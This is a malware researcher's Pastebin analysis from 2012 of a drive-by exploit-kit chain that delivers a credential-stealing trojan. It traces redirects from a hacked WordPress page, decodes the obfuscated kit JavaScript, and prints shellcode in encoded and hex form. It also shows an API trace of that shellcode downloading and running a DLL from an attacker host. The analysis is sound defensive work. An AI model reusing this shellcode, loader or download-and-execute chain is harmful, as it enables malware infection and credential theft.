Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # MalwareMustDie - PluginDetect Decoding Guide
- # for the Trojan parfeit Investigation
- # (Credential Stealer Case)
- ------------
- --18:06:57-- h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
- => `cpa_inform.htm'
- Resolving www.irwra.com... 50.116.98.44
- Connecting to www.irwra.com|50.116.98.44|:80... connected.
- HTTP request sent, awaiting response... HTTP/1.1 200 OK
- // real time with Xurl..
- @unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
- % Total % Received % Xferd Average Speed Time Time Time Current
- Dload Upload Total Spent Left Speed
- 100 813 100 813 0 0 1187 0 --:--:-- --:--:-- --:--:-- 4567
- <html>
- <head>
- <title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>
- <script type="text/javascript">
- <!--
- location.replace("h00p://latticesoft.net/detects/continues-little.php");
- //-->
- </script>
- <noscript>
- <meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
- </noscript>
- </head>
- <h1>You will be redirected to details of purchase</h1>
- <h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>
- <h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>
- <h3>Redirecting to Survey details... Please wait...</h3>
- </html>
- ------------------------------------------------
- --2012-12-22 03:44:27-- h00p://latticesoft.net/detects/continues-little.php
- Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
- Caching latticesoft.net => 59.57.247.185
- Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.
- ---request begin---
- GET /detects/continues-little.php HTTP/1.1
- Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
- User-Agent: #MalwareMustDie!
- Accept: */*
- Host: latticesoft.net
- Connection: Keep-Alive
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Server: nginx/1.3.3
- Date: Fri, 21 Dec 2012 18:44:29 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: close
- X-Powered-By: PHP/5.3.14
- 200 OK
- Length: unspecified [text/html]
- Saving to: `continues-little.php'
- 2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]
- --------------------------------------------------------
- TRY TWO:
- --14:18:07-- h00p://latticesoft.net/detects/continues-little.php
- => `continues-little.php.1'
- Resolving latticesoft.net... seconds 0.00, 59.57.247.185
- Caching latticesoft.net => 59.57.247.185
- Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
- Created socket 1896.
- Releasing 0x003d5348 (new refcount 1).
- ---request begin---
- GET /detects/continues-little.php HTTP/1.0
- Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
- User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
- Accept: */*
- Host: latticesoft.net
- Connection: Keep-Alive
- ---request end---
- HTTP request sent, awaiting response...
- ---response begin---
- HTTP/1.1 200 OK
- Server: nginx/1.3.3
- Date: Sat, 22 Dec 2012 05:17:56 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14
- ---response end---
- 200 OK
- Length: unspecified [text/html]
- 14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337] <=============== the size changes....
- ---------------
- // CHANGES!!!!!! WHy? What?
- // what had changed??
- // let's use unix's diff command to diff the previous code w/new one and see what's changes the moronz did:
- 0x001c1
- < <html><head><title></title></head><body>
- <applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="hw">
- <param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="val"/>
- <param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="prime" />
- </applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){
- 0x007c7
- < <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
- 2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
- 6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
- 3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
- 271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
- 7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
- 7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
- 8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
- -8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
- -5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
- -16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
- -7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
- -8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6
- 0x018c18
- < if(a["su"+"bstr"](i,1)=="-")i+=2;
- ---
- > if(a["substr"](i,1)=="-")i+=2;
- // yep, the moronz was changing the jar applet infector (0x001c1) &
- // it changed the obfuscation code (0x007c7) and also -
- // making more scattered strings for the obfs generator code (0x018c18)
- // These three changes suggested the payload has changed.
- // Nevermind with the old payload so we get into the new one!
- --------------------------------------------------------
- // See the latest code...
- // let's strip the garbage html code & make it more viewable..
- // then see which are th epart of obfuscation & its sturcture,
- // and recognize where's obfuscated data feed code & decoding generator code.
- // After that go to the obfuscation part and undersatnding the structure < important!
- // In this case those malware moronz is splitting obfuscation code within a.setAttribute()
- // arrays using scripts tags, just adjust them by deleting all <script></script>
- // tags and you're good to go.
- // So, the structure of the current obfuscated structure is:
- a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
- z0+1
- :
- z29
- // And this is the code to feed obfuscated data...
- dd="i";
- pp="e"+"In";
- asd=function()
- {
- for(i=0;;i++)
- {
- r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
- }};
- a=document.createElement(dd);
- // Thus, this is the generator part to crack the code;
- document.body.appendChild(a);
- if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
- {
- ss=String.fromCharCode;
- a=document["getElementsB"+"yTagName"](dd);
- a=a[0];
- s=new String();
- asd();
- a=s;
- s=new String();
- e=window["eva"+"l"];
- p=parseInt;
- for(i=0;a.length>i;i+=2)
- {
- if(a["su"+"bstr"](i,1)=="-")i+=2;
- s=s+(ss((p(a["substr"](i,2),23)-24)/3));
- }
- try
- {
- document.body*=document;
- }
- catch(asfas)
- {
- e("if(1)"+s);
- }
- }
- // And this is the logic formula to crack :
- // here's the formula...
- for(i=0;a.length>i;i+=2)
- {
- if(a["substr"](i,1)=="-")i+=2;
- s=s+(ss((p(a["substr"](i,2),23)-24)/3));
- }
- // You can manipulate the decoding operation easlizy by making
- // array of a element and feed the array 0 to 29 with
- // the garbled code one by one and just feed it into the
- // formula.
- //And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)
- var PluginDetect =
- {
- version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
- {
- return function ()
- {
- c(b, a)
- }
- }
- , openTag : "<", isDefined : function (b)
- {
- return typeof b != "undefined"
- }
- , isArray : function (b)
- {
- return (/array/i).test(Object.prototype.toString.call(b))
- :
- :(blah! etc)
- //let's modify shellcode to grab the payload:
- var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
- var x=a["replace"](/\%!/g, "%" + "u");
- document.write(x);
- ↓↓
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828
- // here's the shellcode (in bin & text)....
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
- e9 08 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
- 58 40 5c 5c 58 12 07 07 44 49 5c 5c 41 4b 4d 5b X@\\X...DI\\AKM[
- 47 4e 5c 06 46 4d 5c 07 4c 4d 5c 4d 4b 5c 5b 07 GN\.FM\.LM\MK\[.
- 4b 47 46 5c 41 46 5d 4d 5b 05 44 41 5c 5c 44 4d KGF\AF]M[.DA\\DM
- 06 58 40 58 17 52 4e 15 1b 18 12 1a 5e 12 19 4e .X@X.RN.....^..N
- 12 19 42 12 1b 18 0e 4f 4d 15 19 46 12 1a 5f 12 ..B....OM..F.._.
- 19 41 12 19 42 12 19 47 12 19 41 12 19 4f 12 1a .A..B..G..A..O..
- 5e 12 19 45 12 19 45 0e 44 15 19 43 0e 41 5f 15 ^..E..E.D..C.A_.
- 52 0e 40 4e 15 4c 28 28 R.@N.L((
- // And the translation of the API.....
- 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
- 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
- 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
- ----
- #MalwareMustDie!
- unixfreaxjp /malware]$ date
- Sat Dec 22 18:59:02 JST 2012
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement